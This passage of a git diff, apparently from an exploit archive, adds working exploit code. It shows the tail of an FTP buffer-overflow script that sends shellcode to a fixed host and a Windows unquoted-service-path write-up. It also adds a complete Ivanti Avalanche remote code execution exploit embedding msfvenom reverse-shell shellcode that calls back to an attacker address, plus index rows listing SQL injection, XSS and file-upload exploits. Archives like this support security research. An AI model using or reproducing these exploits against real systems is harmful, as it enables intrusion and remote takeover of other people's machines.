+"\x1b\x8f\x2d\x1c\x9a\x59\x7c\xdd\x31\xa4\xb0\x2c\x4b\xe1"
+"\x77\xcf\x3e\x1b\x84\x72\x39\xd8\xf6\xa8\xcc\xfa\x51\x3a"
+"\x76\x26\x63\xef\xe1\xad\x6f\x44\x65\xe9\x73\x5b\xaa\x82"
+"\x88\xd0\x4d\x44\x19\xa2\x69\x40\x41\x70\x13\xd1\x2f\xd7"
+"\x2c\x01\x90\x88\x88\x4a\x3d\xdc\xa0\x11\x2a\x11\x89\xa9"
+"\xaa\x3d\x9a\xda\x98\xe2\x30\x74\x91\x6b\x9f\x83\xd6\x41"
+"\x67\x1b\x29\x6a\x98\x32\xee\x3e\xc8\x2c\xc7\x3e\x83\xac"
+"\xe8\xea\x04\xfc\x46\x45\xe5\xac\x26\x35\x8d\xa6\xa8\x6a"
+"\xad\xc9\x62\x03\x44\x30\xe5\xec\x31\xa8\x73\x84\x43\xcc"
+"\x6a\x09\xcd\x2a\xe6\xa1\x9b\xe5\x9f\x58\x86\x7d\x01\xa4"
+"\x1c\xf8\x01\x2e\x93\xfd\xcc\xc7\xde\xed\xb9\x27\x95\x4f"
+"\x6f\x37\x03\xe7\xf3\xaa\xc8\xf7\x7a\xd7\x46\xa0\x2b\x29"
+"\x9f\x24\xc6\x10\x09\x5a\x1b\xc4\x72\xde\xc0\x35\x7c\xdf"
+"\x85\x02\x5a\xcf\x53\x8a\xe6\xbb\x0b\xdd\xb0\x15\xea\xb7"
+"\x72\xcf\xa4\x64\xdd\x87\x31\x47\xde\xd1\x3d\x82\xa8\x3d"
+"\x8f\x7b\xed\x42\x20\xec\xf9\x3b\x5c\x8c\x06\x96\xe4\xac"
+"\xe4\x32\x11\x45\xb1\xd7\x98\x08\x42\x02\xde\x34\xc1\xa6"
+"\x9f\xc2\xd9\xc3\x9a\x8f\x5d\x38\xd7\x80\x0b\x3e\x44\xa0"
+"\x19")
+
+shellcode = 'A' * 247 + "\x3b\x69\x5a\x77" + '\x90' * 10 + payload
+
+def main():
+    ip = '192.168.146.135'
+    port = 21
+
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    sock.connect((ip, port))
+
+    sock.recv(1024)
+    sock.send('USER anonymous\r\n')
+    sock.recv(1024)
+    sock.send('PASS anonymous\r\n')
+    sock.recv(1024)
+    sock.send('pwd ' + shellcode + '\r\n')
+    sock.close()
+
+if __name__ == '__main__':
+    main()
\ No newline at end of file
diff --git a/exploits/windows/local/51707.txt b/exploits/windows/local/51707.txt
new file mode 100644
index 0000000000..1194545638
--- /dev/null
+++ b/exploits/windows/local/51707.txt
@@ -0,0 +1,29 @@
+#Exploit Title: Kingo ROOT 1.5.8 - Unquoted Service Path
+#Date: 8/22/2023
+#Exploit Author: Anish Feroz (ZEROXINN)
+#Vendor Homepage: https://www.kingoapp.com/
+#Software Link: https://www.kingoapp.com/android-root/download.htm
+#Version: 1.5.8.3353
+#Tested on: Windows 10 Pro
+
+-------------Discovering Unquoted Path--------------
+
+C:\Users\Anish>sc qc KingoSoftService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: KingoSoftService
+        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Users\Usman\AppData\Local\Kingosoft\Kingo Root\update_27205\bin\KingoSoftService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : KingoSoftService
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\Anish>systeminfo
+
+Host Name:                 DESKTOP-UT7E7CF
+OS Name:                   Microsoft Windows 10 Pro
+OS Version:                10.0.19045 N/A Build 19045
\ No newline at end of file
diff --git a/exploits/windows/remote/51699.py b/exploits/windows/remote/51699.py
new file mode 100755
index 0000000000..3d6c2e0467
--- /dev/null
+++ b/exploits/windows/remote/51699.py
@@ -0,0 +1,122 @@
+"""
+Exploit Title: Ivanti Avalanche <v6.4.0.0 - Remote Code Execution
+Date: 2023-08-16
+Exploit Author: Robel Campbell (@RobelCampbell)
+Vendor Homepage: https://www.ivanti.com/
+Software Link: https://www.wavelink.com/download/Downloads.aspx?DownloadFile=27550&returnUrl=/Download-Avalanche_Mobile-Device-Management-Software/
+Version: v6.4.0.0
+Tested on: Windows 11 21H2
+CVE: CVE-2023-32560
+Reference: https://www.tenable.com/security/research/tra-2023-27
+"""
+
+import socket
+import struct
+import sys
+
+# Create an item structure for the header and payload
+class Item:
+    def __init__(self, type_, name, value):
+        self.type = type_
+        self.name = name.encode()
+        self.value = value
+        self.name_size = 0x5
+        self.value_size = 0x800
+
+    def pack(self):
+        return struct.pack('>III{}s{}s'.format(self.name_size, self.value_size),
+                           self.type, self.name_size, self.value_size, self.name, self.value)
+
+# Create a header structure
+class HP:
+    def __init__(self, hdr, payload):
+        self.hdr = hdr
+        self.payload = payload
+        self.pad = b'\x00' * (16 - (len(self.hdr) + len(self.payload)) % 16)
+
+    def pack(self):
+        return b''.join([item.pack() for item in self.hdr]) + \
+               b''.join([item.pack() for item in self.payload]) + self.pad
+
+# Create a preamble structure
+class Preamble:
+    def __init__(self, hp):
+        self.msg_size = len(hp.pack()) + 16
+        self.hdr_size = sum([len(item.pack()) for item in hp.hdr])
+        self.payload_size = sum([len(item.pack()) for item in hp.payload])
+        self.unk = 0  # Unknown value
+
+    def pack(self):
+        return struct.pack('>IIII', self.msg_size, self.hdr_size, self.payload_size, self.unk)
+
+# Create a message structure
+class Msg:
+    def __init__(self, hp):
+        self.pre = Preamble(hp)
+        self.hdrpay = hp
+
+    def pack(self):
+        return self.pre.pack() + self.hdrpay.pack()
+
+# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.86.30 LPORT=4444 exitfunc=thread -f python
+shellcode =  b""
+shellcode += b"fce8820000006089e531c064"
+shellcode += b"8b50308b520c8b52148b7228"
+shellcode += b"0fb74a2631ffac3c617c022c"
+shellcode += b"20c1cf0d01c7e2f252578b52"
+shellcode += b"108b4a3c8b4c1178e34801d1"
+shellcode += b"518b592001d38b4918e33a49"
+shellcode += b"8b348b01d631ffacc1cf0d01"
+shellcode += b"c738e075f6037df83b7d2475"
+shellcode += b"e4588b582401d3668b0c4b8b"
+shellcode += b"581c01d38b048b01d0894424"
+shellcode += b"245b5b61595a51ffe05f5f5a"
+shellcode += b"8b12eb8d5d68333200006877"
+shellcode += b"73325f54684c772607ffd5b8"
+shellcode += b"9001000029c454506829806b"
+shellcode += b"00ffd5505050504050405068"
+shellcode += b"ea0fdfe0ffd5976a0568c0a8"
+shellcode += b"561e680200115c89e66a1056"
+shellcode += b"576899a57461ffd585c0740c"
+shellcode += b"ff4e0875ec68f0b5a256ffd5"
+shellcode += b"68636d640089e357575731f6"
+shellcode += b"6a125956e2fd66c744243c01"
+shellcode += b"018d442410c6004454505656"
+shellcode += b"5646564e565653566879cc3f"
+shellcode += b"86ffd589e04e5646ff306808"
+shellcode += b"871d60ffd5bbe01d2a0a68a6"
+shellcode += b"95bd9dffd53c067c0a80fbe0"
+shellcode += b"7505bb4713726f6a0053ffd5"
+
+buf = b'90' * 340
+buf += b'812b4100' # jmp esp (0x00412b81)
+buf += b'90909090'
+buf += b'90909090'
+buf += shellcode
+buf += b'41' * 80
+buf += b'84d45200' # stack pivot: add esp, 0x00000FA0 ; retn 0x0004 ; (0x0052d484)
+buf += b'43' * (0x800 - len(buf))
+
+buf2 = b'41' * 0x1000
+
+# Create message payload
+hdr = [Item(3, "pwned", buf)]
+payload = [Item(3, "pwned", buf2)] # dummy payload, probabaly not necessary
+hp_instance = HP(hdr, payload)
+msg_instance = Msg(hp_instance)
+
+# Default port
+port = 1777
+
+# check for target host argument
+if len(sys.argv) > 1:
+    host = sys.argv[1]
+else:
+    print("Usage: python3 CVE-2023-32560.py <host ip>")
+    sys.exit()
+
+with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
+    s.connect((host, port))
+    s.sendall(msg_instance.pack())
+    print("Message sent!")
+    s.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 3beec49dbe..df666aeb8a 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -4299,6 +4299,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 44580,exploits/hardware/webapps/44580.txt,"DLINK DCS-5020L - Remote Code Execution (PoC)",2018-03-27,"Fidus InfoSecurity",webapps,hardware,,2018-05-03,2022-11-04,0,CVE-2017-17020,,,,,https://www.fidusinfosec.com/dlink-dcs-5030l-remote-code-execution-cve-2017-17020/
 44388,exploits/hardware/webapps/44388.txt,"DLink DIR-601 - Admin Password Disclosure",2018-04-02,"Kevin Randall",webapps,hardware,,2018-04-02,2018-04-02,0,CVE-2018-5708,,,,,
 45306,exploits/hardware/webapps/45306.txt,"DLink DIR-601 - Credential Disclosure",2018-08-30,"Kevin Randall",webapps,hardware,,2018-08-30,2018-08-30,0,CVE-2018-12710,,,,,
+51709,exploits/hardware/webapps/51709.txt,"DLINK DPH-400SE - Exposure of Sensitive Information",2023-09-04,tahaafarooq,webapps,hardware,,2023-09-04,2023-09-04,0,,,,,,
 43898,exploits/hardware/webapps/43898.html,"Dodocool DC38 N300 - Cross-site Request Forgery",2018-01-26,"Raffaele Sabato",webapps,hardware,,2018-01-26,2018-01-26,0,CVE-2018-5720,,,,,
 48436,exploits/hardware/webapps/48436.txt,"Draytek VigorAP 1000C - Persistent Cross-Site Scripting",2020-05-07,Vulnerability-Lab,webapps,hardware,,2020-05-07,2020-05-07,0,,,,,,
 36286,exploits/hardware/webapps/36286.txt,"DreamBox DM800 - 'file' Local File Disclosure",2011-11-04,"Todor Donev",webapps,hardware,,2011-11-04,2017-07-19,1,CVE-2011-4716;OSVDB-73430,,,,,https://www.securityfocus.com/bid/50520/info
@@ -11781,6 +11782,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,,2017-09-27,2017-09-27,0,,,,,,https://forsec.nl/2017/09/smart-home-remote-command-execution-rce/
 48240,exploits/multiple/webapps/48240.txt,"FIBARO System Home Center 5.021 - Remote File Include",2020-03-23,LiquidWorm,webapps,multiple,,2020-03-23,2020-03-23,0,,,,,,
 50717,exploits/multiple/webapps/50717.txt,"FileBrowser 2.17.2 - Cross Site Request Forgery (CSRF) to Remote Code Execution (RCE)",2022-02-08,"FEBIN MON SAJI",webapps,multiple,,2022-02-08,2022-02-08,0,CVE-2021-46398,,,,,
+51708,exploits/multiple/webapps/51708.py,"FileMage Gateway 1.10.9 - Local File Inclusion",2023-09-04,"Bryce Raindayzz Harty",webapps,multiple,,2023-09-04,2023-09-04,0,CVE-2023-39026,,,,,
 48607,exploits/multiple/webapps/48607.txt,"FileRun 2019.05.21 -  Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,multiple,,2020-06-22,2020-06-22,0,CVE-2019-12905,,,,,
 23111,exploits/multiple/webapps/23111.txt,"FirePass SSL VPN - Local File Inclusion",2012-12-03,"SEC Consult",webapps,multiple,,2012-12-03,2012-12-03,0,OSVDB-88091,,,,,
 35743,exploits/multiple/webapps/35743.txt,"Flash Tag Cloud And MT-Cumulus Plugin - 'tagcloud' Cross-Site Scripting",2011-05-13,MustLive,webapps,multiple,,2011-05-13,2015-01-10,1,,,,,,https://www.securityfocus.com/bid/47845/info
@@ -13315,6 +13317,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 45596,exploits/php/webapps/45596.txt,"Academic Timetable Final Build 7.0a-7.0b - 'id' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php,80,2018-10-15,2018-10-18,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comAcademic_Timetable_Final_Build_v70.zip,
 45600,exploits/php/webapps/45600.txt,"Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin)",2018-10-15,"Ihsan Sencan",webapps,php,80,2018-10-15,2018-10-18,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comAcademic_Timetable_Final_Build_v70.zip,
 51654,exploits/php/webapps/51654.txt,"Academy LMS 6.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4119,,,,,
+51702,exploits/php/webapps/51702.txt,"Academy LMS 6.1 - Arbitrary File Upload",2023-09-04,CraCkEr,webapps,php,,2023-09-04,2023-09-04,0,,,,,,
 36110,exploits/php/webapps/36110.txt,"ACal 2.2.6 - 'calendar.php' Cross-Site Scripting",2011-09-02,T0xic,webapps,php,,2011-09-02,2015-04-18,1,,,,,http://www.exploit-db.comACal-2.2.6.zip,https://www.securityfocus.com/bid/49442/info
 1763,exploits/php/webapps/1763.txt,"ACal 2.2.6 - 'day.php' Remote File Inclusion",2006-05-07,PiNGuX,webapps,php,,2006-05-06,2015-04-18,1,OSVDB-25340;CVE-2006-2261,,,,http://www.exploit-db.comACal-2.2.6.zip,
 38697,exploits/php/webapps/38697.txt,"ACal 2.2.6 - 'view' Local File Inclusion",2013-08-15,ICheer_No0M,webapps,php,,2013-08-15,2015-11-15,1,OSVDB-96304,,,,,https://www.securityfocus.com/bid/61801/info
@@ -13490,6 +13493,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 4005,exploits/php/webapps/4005.txt,"AdminBot 9.0.5 - 'live_status.lib.php' Remote File Inclusion",2007-05-29,"ThE TiGeR",webapps,php,,2007-05-28,2016-12-22,1,OSVDB-38364;CVE-2007-2986,,,,,
 43593,exploits/php/webapps/43593.txt,"Adminer 4.3.1 - Server-Side Request Forgery",2018-01-15,hyp3rlinx,webapps,php,,2018-01-15,2018-12-14,0,,,,,,
 9075,exploits/php/webapps/9075.txt,"AdminLog 0.5 - 'valid_login' Authentication Bypass",2009-07-02,SirGod,webapps,php,,2009-07-01,,1,OSVDB-55602,,,,,
+51705,exploits/php/webapps/51705.txt,"AdminLTE PiHole 5.18 - Broken Access Control",2023-09-04,kv1to,webapps,php,,2023-09-04,2023-09-04,0,CVE-2022-23513,,,,,
 6640,exploits/php/webapps/6640.pl,"ADN Forum 1.0b - Blind SQL Injection",2008-10-01,StAkeR,webapps,php,,2008-09-30,2016-12-23,1,CVE-2006-0123;OSVDB-22240,,,,http://www.exploit-db.comadnforum-1.0b.zip,
 6557,exploits/php/webapps/6557.txt,"ADN Forum 1.0b - Insecure Cookie Handling",2008-09-24,Pepelux,webapps,php,,2008-09-23,2016-12-23,1,OSVDB-52458;CVE-2008-6001,,,,http://www.exploit-db.comadnforum-1.0b.zip,
 28104,exploits/php/webapps/28104.txt,"ADODB 4.6/4.7 - 'Tmssql.php' Cross-Site Scripting",2006-06-26,"Rodrigo Silva",webapps,php,,2006-06-26,2013-09-05,1,OSVDB-27620,,,,,https://www.securityfocus.com/bid/18638/info
@@ -14904,6 +14908,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 28574,exploits/php/webapps/28574.txt,"Blojsom 2.31 - Cross-Site Scripting",2006-09-14,"Avinash Shenoi",webapps,php,,2006-09-14,2013-09-27,1,CVE-2006-4829;OSVDB-28834,,,,,https://www.securityfocus.com/bid/20026/info
 5234,exploits/php/webapps/5234.txt,"Bloo 1.00 - Multiple SQL Injections",2008-03-11,MhZ91,webapps,php,,2008-03-10,2016-11-23,1,OSVDB-42778;CVE-2008-1313,,,,http://www.exploit-db.combloo.v.1.00.tgz,
 50362,exploits/php/webapps/50362.txt,"Blood Bank System 1.0 - Authentication Bypass",2021-10-01,"Nitin Sharma",webapps,php,,2021-10-01,2021-10-28,0,,,,,,
+51697,exploits/php/webapps/51697.txt,"Blood Donor Management System v1.0 - Stored XSS",2023-09-04,"Ehlullah Albayrak",webapps,php,,2023-09-04,2023-09-04,0,,,,,,
 47842,exploits/php/webapps/47842.txt,"BloodX 1.0 - Authentication Bypass",2020-01-02,riamloo,webapps,php,,2020-01-02,2020-02-07,1,,,,,,
 48786,exploits/php/webapps/48786.txt,"BloodX CMS 1.0 - Authentication Bypass",2020-09-03,BKpatron,webapps,php,,2020-09-03,2020-09-03,0,,,,,,
 4945,exploits/php/webapps/4945.txt,"bloofox 0.3 - SQL Injection / File Disclosure",2008-01-20,BugReport.IR,webapps,php,,2008-01-19,2016-10-27,1,OSVDB-40437;CVE-2008-0428;OSVDB-40436;CVE-2008-0427,,,,,http://bugreport.ir/?/27
@@ -15159,6 +15164,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",2021-09-06,sudoninja,webapps,php,,2021-09-06,2023-07-15,1,,,,,,
 50235,exploits/php/webapps/50235.txt,"Bus Pass Management System 1.0 - 'viewid' SQL Injection",2021-08-30,"Aryan Chehreghani",webapps,php,,2021-08-30,2023-07-15,1,,,,,,
 51054,exploits/php/webapps/51054.txt,"Bus Pass Management System 1.0 - Cross-Site Scripting (XSS)",2023-03-25,"Ali Alipour",webapps,php,,2023-03-25,2023-06-26,1,CVE-2022-35155,,,,,
+51712,exploits/php/webapps/51712.txt,"Bus Reservation System 1.1 - Multiple-SQLi",2023-09-04,nu11secur1ty,webapps,php,,2023-09-04,2023-09-04,0,,,,,,
 9633,exploits/php/webapps/9633.txt,"Bus Script - 'sitetext_id' SQL Injection",2009-09-10,Mr.SQL,webapps,php,,2009-09-09,,1,OSVDB-57985;CVE-2009-4618;OSVDB-57984,,,,,
 41561,exploits/php/webapps/41561.txt,"Busewe 1.2 - SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php,,2017-03-09,2017-03-09,0,,,,,,
 41097,exploits/php/webapps/41097.txt,"Business Directory Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php,,2017-01-18,2017-01-18,0,,,,,,
@@ -16379,6 +16385,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 27835,exploits/php/webapps/27835.txt,"Creative Software UK Community Portal 1.1 - 'PollResults.php' Multiple SQL Injections",2006-05-08,r0t,webapps,php,,2006-05-08,2013-08-25,1,CVE-2006-2255;OSVDB-25311,,,,,https://www.securityfocus.com/bid/17890/info
 11300,exploits/php/webapps/11300.txt,"Creative SplashWorks-SplashSite - 'page.php' Blind SQL Injection",2010-01-31,AtT4CKxT3rR0r1ST,webapps,php,,2010-01-30,,0,,,,,,
 12807,exploits/php/webapps/12807.txt,"Creato Script - SQL Injection",2010-05-30,Mr.P3rfekT,webapps,php,,2010-05-29,,1,,,,,,
+51701,exploits/php/webapps/51701.txt,"Credit Lite 1.5.4 - SQL Injection",2023-09-04,CraCkEr,webapps,php,,2023-09-04,2023-09-04,0,CVE-2023-4407,,,,,
 1446,exploits/php/webapps/1446.pl,"creLoaded 6.15 - 'HTMLAREA' Automated Perl",2006-01-24,kaneda,webapps,php,,2006-01-23,,1,OSVDB-22793;CVE-2006-0478,,,,,
 35631,exploits/php/webapps/35631.txt,"CRESUS - 'recette_detail.php' SQL Injection",2011-04-19,"GrayHatz Security Group",webapps,php,,2011-04-19,2014-12-27,1,,,,,,https://www.securityfocus.com/bid/47416/info
 50213,exploits/php/webapps/50213.txt,"Crime records Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",2021-08-18,"Davide Taraschi",webapps,php,,2021-08-18,2021-08-18,0,,,,,,
@@ -16425,6 +16432,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50846,exploits/php/webapps/50846.txt,"CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated)",2022-03-30,"Rahad Chowdhury",webapps,php,,2022-03-30,2022-03-30,0,CVE-2021-43701,,,,,
 49364,exploits/php/webapps/49364.txt,"CSZ CMS 1.2.9 - Multiple Cross-Site Scripting",2021-01-05,SunCSR,webapps,php,,2021-01-05,2021-01-05,0,,,,,,
 50899,exploits/php/webapps/50899.txt,"CSZ CMS 1.3.0 - 'Multiple' Blind SQLi",2022-05-11,"Dogukan Dincer",webapps,php,,2022-05-11,2022-05-11,0,,,,,,
+51703,exploits/php/webapps/51703.txt,"CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL' )",2023-09-04,"Daniel González",webapps,php,,2023-09-04,2023-09-04,0,,,,,,
+51704,exploits/php/webapps/51704.txt,"CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')",2023-09-04,"Daniel González",webapps,php,,2023-09-04,2023-09-04,0,,,,,,
 31517,exploits/php/webapps/31517.txt,"CTERA 3.2.29.0/3.2.42.0 - Persistent Cross-Site Scripting",2014-02-07,"Luigi Vezzoso",webapps,php,80,2014-02-07,2014-02-07,0,CVE-2013-2639;OSVDB-103117,,,,,
 11063,exploits/php/webapps/11063.txt,"CU Village CMS Site 1.0 - 'print_view' Blind SQL Injection",2010-01-08,Red-D3v1L,webapps,php,,2010-01-07,,1,,,,,,
 11495,exploits/php/webapps/11495.txt,"CubeCart - 'index.php' SQL Injection",2010-02-18,AtT4CKxT3rR0r1ST,webapps,php,,2010-02-17,,1,,,,,,
@@ -19628,6 +19637,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 44954,exploits/php/webapps/44954.txt,"hycus CMS 1.0.4 - Authentication Bypass",2018-06-28,"Berk Dusunur",webapps,php,,2018-06-28,2018-06-28,0,,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,
 16213,exploits/php/webapps/16213.txt,"Hyena Cart - 'index.php' SQL Injection",2011-02-23,AtT4CKxT3rR0r1ST,webapps,php,,2011-02-23,2011-02-23,1,,,,,,
 29909,exploits/php/webapps/29909.txt,"HYIP Manager Pro - Multiple Remote File Inclusions",2007-04-25,alijsb,webapps,php,,2007-04-25,2013-11-29,1,CVE-2007-2326;OSVDB-35554,,,,,https://www.securityfocus.com/bid/23663/info
+51698,exploits/php/webapps/51698.txt,"Hyip Rio 2.1 - Arbitrary File Upload",2023-09-04,CraCkEr,webapps,php,,2023-09-04,2023-09-04,0,CVE-2023-4382,,,,,
 32395,exploits/php/webapps/32395.txt,"HyperStop WebHost Directory 1.2 - Database Disclosure",2008-09-19,r45c4l,webapps,php,,2008-09-19,2014-03-20,1,CVE-2008-7008;OSVDB-48282,,,,,https://www.securityfocus.com/bid/31249/info
 46776,exploits/php/webapps/46776.txt,"Hyvikk Fleet Manager - Shell Upload",2019-04-30,saxgy1331,webapps,php,,2019-04-30,2019-05-01,0,,,,,,
 41979,exploits/php/webapps/41979.txt,"I_ Librarian 4.6/4.7 - Command Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting",2017-05-09,"SEC Consult",webapps,php,,2017-05-09,2017-05-09,1,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comI-Librarian-4.6-Linux.tar.xz,
@@ -23180,6 +23190,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 39124,exploits/php/webapps/39124.txt,"MeiuPic 2.1.2 - 'ctl' Local File Inclusion",2014-03-10,Dr.3v1l,webapps,php,,2014-03-10,2016-10-24,1,OSVDB-105001,,,,,https://www.securityfocus.com/bid/66317/info
 5648,exploits/php/webapps/5648.pl,"MeltingIce File System 1.0 - Arbitrary Add User",2008-05-18,t0pP8uZz,webapps,php,,2008-05-17,2016-12-02,1,OSVDB-45512;CVE-2008-2348,,,,http://www.exploit-db.commeltingice_file_system_v1.0.zip,
 12850,exploits/php/webapps/12850.txt,"Member ID The Fish Index PHP - SQL Injection",2010-06-03,v4lc0m87,webapps,php,,2010-06-02,,1,,,,,,
+51710,exploits/php/webapps/51710.txt,"Member Login Script 3.3 - Client-side desync",2023-09-04,nu11secur1ty,webapps,php,,2023-09-04,2023-09-04,0,,,,,,
 7638,exploits/php/webapps/7638.txt,"Memberkit 1.0 - Arbitrary File Upload",2009-01-01,Lo$er,webapps,php,,2008-12-31,2017-01-11,1,OSVDB-51207,,,,,
 31011,exploits/php/webapps/31011.txt,"Members Area System 1.7 - 'view_func.php' Remote File Inclusion",2008-01-11,ShipNX,webapps,php,,2008-01-11,2014-01-17,1,CVE-2008-0289;OSVDB-40326,,,,,https://www.securityfocus.com/bid/27244/info
 41780,exploits/php/webapps/41780.txt,"Membership Formula - 'order' SQL Injection",2017-03-31,"Ihsan Sencan",webapps,php,,2017-03-31,2017-03-31,0,,,,,,
@@ -30012,6 +30023,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 7946,exploits/php/webapps/7946.txt,"sourdough 0.3.5 - Remote File Inclusion",2009-02-02,ahmadbady,webapps,php,,2009-02-01,,1,OSVDB-51822;CVE-2009-0456,,,,,
 45736,exploits/php/webapps/45736.txt,"South Gate Inn Online Reservation System 1.0 - 'q' SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80,2018-10-30,2018-10-30,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comsouthgateinn_0.zip,
 11430,exploits/php/webapps/11430.txt,"southburn Web - 'products.php' SQL Injection",2010-02-13,AtT4CKxT3rR0r1ST,webapps,php,,2010-02-12,,1,,,,,,
+51713,exploits/php/webapps/51713.txt,"SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS",2023-09-04,CraCkEr,webapps,php,,2023-09-04,2023-09-04,0,CVE-2023-4547,,,,,
 12756,exploits/php/webapps/12756.txt,"Spaceacre - '/index.php' SQL Injection / HTML / Cross-Site Scripting Injection",2010-05-26,CoBRa_21,webapps,php,,2010-05-25,,1,,,,,,
 12551,exploits/php/webapps/12551.txt,"Spaceacre - Multiple SQL Injections",2010-05-10,gendenk,webapps,php,,2010-05-09,,1,,,,,,
 12746,exploits/php/webapps/12746.txt,"Spaceacre - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-26,XroGuE,webapps,php,,2010-05-25,,1,,,,,,
@@ -32133,8 +32145,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 17057,exploits/php/webapps/17057.txt,"webEdition CMS - Local File Inclusion",2011-03-28,eidelweiss,webapps,php,,2011-03-28,2011-10-02,0,,,,,http://www.exploit-db.comwebEdition_6102.tar.gz,http://eidelweiss-advisories.blogspot.com/2011/03/webedition-cms-version-6102.html
 35516,exploits/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 - 'DOCUMENT_ROOT' Local File Inclusion",2011-03-28,eidelweiss,webapps,php,,2011-03-28,2014-12-10,1,,,,,,https://www.securityfocus.com/bid/47065/info
 17054,exploits/php/webapps/17054.txt,"webEdition CMS 6.1.0.2 - Multiple Vulnerabilities",2011-03-27,"AutoSec Tools",webapps,php,,2011-03-27,2011-03-29,1,,,,,http://www.exploit-db.comwebEdition_6102.tar.gz,
-51661,exploits/php/webapps/51661.txt,"Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)",2023-08-04,"Mirabbas Ağalarov",webapps,php,,2023-08-04,2023-08-04,0,,,,,,
-51662,exploits/php/webapps/51662.txt,"Webedition CMS v2.9.8.8 - Stored XSS",2023-08-04,"Mirabbas Ağalarov",webapps,php,,2023-08-04,2023-08-04,0,,,,,,
+51661,exploits/php/webapps/51661.txt,"Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)",2023-08-04,"Mirabbas Ağalarov",webapps,php,,2023-08-04,2023-09-04,1,,,,,,
+51662,exploits/php/webapps/51662.txt,"Webedition CMS v2.9.8.8 - Stored XSS",2023-08-04,"Mirabbas Ağalarov",webapps,php,,2023-08-04,2023-09-04,1,,,,,,
 14132,exploits/php/webapps/14132.html,"webERP 3.11.4 - Multiple Vulnerabilities",2010-06-30,"ADEO Security",webapps,php,,2010-06-30,2010-07-07,0,OSVDB-65930,,,,http://www.exploit-db.comwebERP_3.11.4.zip,
 35333,exploits/php/webapps/35333.py,"webERP 4.0.1 - 'InputSerialItemsFile.php' Arbitrary File Upload",2011-02-10,"AutoSec Tools",webapps,php,,2011-02-10,2014-11-23,1,,,,,,https://www.securityfocus.com/bid/46341/info
 19431,exploits/php/webapps/19431.txt,"webERP 4.08.1 - Local/Remote File Inclusion",2012-06-28,dun,webapps,php,,2012-06-28,2012-06-29,1,OSVDB-83414;OSVDB-83400,,,,,
@@ -33898,6 +33910,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51122,exploits/php/webapps/51122.py,"WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)",2023-03-29,AkuCyberSec,webapps,php,,2023-03-29,2023-06-09,1,CVE-2022-1565,,,,,
 51560,exploits/php/webapps/51560.txt,"WP AutoComplete 1.0.4 - Unauthenticated SQLi",2023-07-03,matitanium,webapps,php,,2023-07-03,2023-07-03,0,CVE-2022-4297,,,,,
 47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php,,2019-09-25,2019-09-25,0,,,,,,
+51711,exploits/php/webapps/51711.py,"WP Statistics Plugin 13.1.5 current_page_id - Time based SQL injection (Unauthenticated)",2023-09-04,psychoSherlock,webapps,php,,2023-09-04,2023-09-04,0,CVE-2022-25148,,,,,
 51533,exploits/php/webapps/51533.py,"WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)",2023-06-20,"Amirhossein Bahramizadeh",webapps,php,,2023-06-20,2023-06-20,0,CVE-2023-3320,,,,,
 51224,exploits/php/webapps/51224.py,"WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE",2023-04-03,BLY,webapps,php,,2023-04-03,2023-05-24,1,CVE-2020-25213,,,,,
